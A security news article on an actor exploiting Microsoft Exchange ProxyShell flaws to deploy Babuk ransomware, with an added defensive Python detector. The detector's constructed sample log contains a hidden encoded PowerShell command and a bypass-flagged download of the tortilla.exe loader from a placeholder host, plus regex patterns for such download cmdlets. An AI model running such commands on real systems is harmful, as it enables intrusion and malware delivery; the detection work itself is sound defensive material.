Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware
Microsoft Exchange ransomware attack
A new threat actor is hacking Microsoft Exchange servers and breaching corporate networks using the ProxyShell vulnerability to deploy the Babuk Ransomware.
The ProxyShell attacks against vulnerable Microsoft Exchange servers started several months ago, with LockFile and Conti being among the first ransomware groups to exploit them.
According to a report by researchers at Cisco Talos, a Babuk ransomware affiliate known as ‘Tortilla’ had joined the club in October, when the actor started using the ‘China Chopper’ web shell on breached Exchange servers.
The name Tortilla comes from malicious executables named Tortilla.exe that were spotted in the campaigns.
The Babuk ransomware attack starts with a DLL, or .NET executable dropped on the Exchange server using the ProxyShell vulnerability.
The Exchange IIS worker process w3wp.exe then executes this malicious payload, which runs an obfuscated PowerShell command that includes endpoint-protection bypass techniques and eventually issues a web request to fetch a payload loader named ‘tortilla.exe.’
This loader connects to ‘’ and downloads a payload that is loaded into memory and injected into a .NET Framework process, which ultimately encrypts the device with the Babuk ransomware.
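The chain above (IIS worker process spawning an obfuscated PowerShell download stage that fetches a loader) is a pattern defenders can look for in process-creation telemetry. The following detector is an added example, not code from the article or from Cisco Talos: it parses constructed process-creation events in a made-up pipe-delimited format loosely modelled on Sysmon Event ID 1 fields, and flags w3wp.exe spawning a shell, encoded or policy-bypass PowerShell flags, download cmdlets, and the tortilla.exe loader name. The sample events, the field names, the hostname placeholder.invalid and the file paths are all constructed for this example.

```python
"""
Added example (not from the article or the Cisco Talos report): scan
process-creation events for the Exchange-worker-to-PowerShell-to-loader
pattern. Log format and events are constructed; no real telemetry is reproduced.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample log. Fields are pipe-separated; CommandLine is always last
# so that a '|' inside a command line does not break parsing.
SAMPLE_LOG = """\
ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c powershell -ep bypass -c "Invoke-WebRequest http://placeholder.invalid/tortilla.exe -OutFile C:\\Windows\\Temp\\tortilla.exe"
ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\svchost.exe|CommandLine=svchost.exe -k netsvcs
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe Get-Process
"""

# The IIS worker process hosting Exchange should not normally spawn shells.
IIS_WORKER = "w3wp.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# -enc / -EncodedCommand followed by a base64 blob, and -ep/-ExecutionPolicy bypass.
ENCODED_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}")
BYPASS_RE = re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass")
# Common PowerShell download primitives used by second-stage fetchers.
DOWNLOAD_RE = re.compile(
    r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer"
)
LOADER_NAME = "tortilla.exe"


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[tuple[int, ProcEvent]]:
    """Parse the constructed log format into (line_number, ProcEvent) pairs."""
    events = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = {}
        # Split into at most three fields so '|' inside CommandLine survives.
        for part in line.split("|", 2):
            key, _, value = part.partition("=")
            fields[key] = value
        events.append((lineno, ProcEvent(
            fields.get("ParentImage", ""),
            fields.get("Image", ""),
            fields.get("CommandLine", ""),
        )))
    return events


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of finding tags that apply to one event (empty if benign)."""
    findings = []
    if basename(ev.parent_image) == IIS_WORKER and basename(ev.image) in SHELLS:
        findings.append("iis-worker-spawned-shell")
    if ENCODED_RE.search(ev.command_line) or BYPASS_RE.search(ev.command_line):
        findings.append("encoded-or-bypass-flag")
    if DOWNLOAD_RE.search(ev.command_line):
        findings.append("download-cmdlet")
    if LOADER_NAME in ev.command_line.lower() or basename(ev.image) == LOADER_NAME:
        findings.append("tortilla-loader")
    return findings


def scan(text: str) -> list[tuple[int, list[str]]]:
    """Return (line_number, findings) for every event that triggers at least one rule."""
    return [(n, f) for n, ev in parse_events(text) if (f := classify(ev))]


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

The first rule alone (w3wp.exe as the parent of a shell) is the high-confidence signal for an Exchange host; the remaining rules add context so an analyst can see at a glance whether the spawned process is also fetching a second stage, which is what the attack chain described above does.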
Although Cisco analysts found evidence of ProxyShell vulnerability exploitation in most infections, most notably the ‘China Chopper’ web shell, the telemetry data reflects a broad spectrum of attempted exploits.
More specifically, Tortilla followed these pathways to drop the DLL and .NET modules:
As these attacks rely on patched vulnerabilities, it is strongly advised that all admins upgrade their servers to the latest versions to prevent them from being exploited in attacks.
Babuk Locker is a ransomware operation launched at the beginning of 2021 when it began targeting businesses and encrypting their data in double-extortion attacks.
After conducting an attack on Washington, DC’s Metropolitan Police Department (MPD), and feeling the heat from U.S. law enforcement, the ransomware gang shut down their operation.
After the source code for the first version of Babuk and a builder were leaked on hacking forums, other threat actors began utilizing the ransomware to launch their own attacks.
It is unclear if Tortilla was an affiliate of Babuk back when the RaaS was active or if they just grabbed the strain’s source code when it came out to conduct new attacks.
However, as the ransom note used in these attacks asks for a low $10,000 in Monero, the attacks are likely not conducted by the original Babuk operation, which demanded far larger ransoms in Bitcoin.
Although Talos researchers noticed some attacks in Germany, Thailand, Brazil, and the U.K., most of Tortilla’s targets are U.S.-based.
The IP address of the download server is located in Moscow, Russia, which could indicate the origin of these attacks, but the report draws no attribution conclusions.
Also, the ‘’ domain used for the unpacking stage has been previously abused by AgentTesla and FormBook distribution campaigns.
While a decryptor was previously released for Babuk ransomware, it can only decrypt victims whose private keys were part of the source code leak.
Therefore, threat actors can continue to use the Babuk ransomware strain to launch their own operations, such as what we are seeing with the Tortilla threat actor.